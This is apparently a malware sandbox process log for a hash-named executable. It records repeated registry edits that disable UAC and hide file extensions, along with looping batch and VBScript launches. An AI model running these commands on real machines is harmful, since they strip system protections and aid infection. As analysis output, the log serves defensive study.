C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MWYcUIks.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aeYYYwEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gCckkUwc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tgwoAYIQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HIIQIwMQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jmUIIwII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TkgscIUs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iIYYYQsk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cikEkwIA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kIsoYoIE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWEgMcwY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OockIIoY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JsUcIUwk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ROgAUkEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jmocwscs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tuYIAIIY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KCEgEUUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMoAcIgs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEIYgUY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aSUMAsco.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JwsYEwQs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

